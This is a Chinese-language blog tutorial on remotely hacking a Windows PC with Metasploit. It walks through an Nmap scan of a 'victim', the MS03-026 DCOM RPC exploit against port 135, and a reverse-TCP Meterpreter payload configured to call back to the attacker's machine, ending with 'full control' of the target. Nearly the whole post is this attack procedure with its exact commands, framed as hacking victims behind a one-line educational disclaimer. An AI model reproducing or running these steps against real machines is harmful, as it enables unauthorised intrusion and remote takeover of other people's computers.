如何使用METASPLOIT远程入侵PC?

作者: michellbazley 分类: 心得分享 发布时间: 2019-03-24 01:25

Metasploit 是一种先进的黑客工具,拥有一整套先进的渗透测试工具。

渗透测试人员和黑客正在利用这个工具获得如此多的优势。

对于黑客而言,这是一个完整的黑客攻击包,他几乎可以使用它进行任何攻击。

我不是在讨论本文中的攻击,但我将分享如何使用 Metasploit 远程攻击 PC。

如果你注意的话,这并不复杂。它只需要更好地了解您正在执行的每个步骤。让我们继续讨论如何做到这一点。

注意:本教程仅供教育使用


在开始之前,请确保使用 metasploit 远程破解 PC 所需的所有内容。

  • Linux 机器(Kali Linux 或 BackTrack 5)
  • Metasploit(内置于上述 Linux 操作系统中)
  • Windows PC 受害者

步骤

让我们继续讨论如何执行完整的攻击。

  • 启动 Linux 操作系统并打开 Nmap 并为受害远程服务器运行扫描。就像我们在远程服务器 192.168.42.129 上有我们的受害者。它将显示受害者计算机的所有开放端口的范围,如下所示。

  • 我们可以看到这里的开放端口是 135.所以,现在我们去 metasploit 并尝试利用它并获得访问权限。要打开,请导航到 应用程序 > BackTrack > 漏洞利用工具 > 网络漏洞利用工具 > Metasploit 框架 > msfconsole

  • msfconsole 初始化标准检查之后,我们将看到如下窗口。

  • 现在,由于我们已经知道我们的端口 135 是开放的,因此我们在 Metasploit 中搜索相关的 RPC 漏洞。您可以使用命令’ show exploits ‘ 查看 metasploit 支持的所有漏洞利用列表。

  • 现在使用一个漏洞,例如:use exploit/windows/dcerpc/ms03_026_dcom

  • 当我们处于我们所需的漏洞利用环境中时,我们需要根据我们的场景配置漏洞利用。要查看漏洞利用的所有可用选项的列表,我们可以使用命令“ show options ”。我们已经知道开放端口 RPORT 是 135.因此,我们只需要设置我们可以使用“ set RHOST ”命令设置的 RHOST。只需输入“ set RHOST 192.168.42.129 ”即可。

  • 现在,在我们启动漏洞之前,就是为漏洞利用设置有效负载。我们可以使用“ show payloads ”命令查看所有可用的有效负载。

  • 每个有效负载都可用于不同的场景。在我们的例子中,我们使用的是反向 tcp meterpreter,可以使用命令“ set PAYLOAD windows/meterpreter/reverse_tcp ”为远程 shell 设置,然后使用“ show options” 命令查看它的选项。

  • 这里我们注意到 LHOST 没有设置有效载荷,所以我们使用命令“ set LHOST 192.168.42.128 ” 将它设置为我们的公共 IP,即 192.168.42.128

  • 现在,exploit 已配置好并准备启动。现在只需使用“ exploit ”命令来发动攻击。如果 exploit 成功执行,我们将看到如下消息。

  • 现在已经在受害者和我们的机器之间建立了反向连接,我们可以完全控制服务器

我们已经成功访问​​了具有 metasploit 的远程 PC。这就是如何使用 metasploit 远程破解 PC。希望它对你有用。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云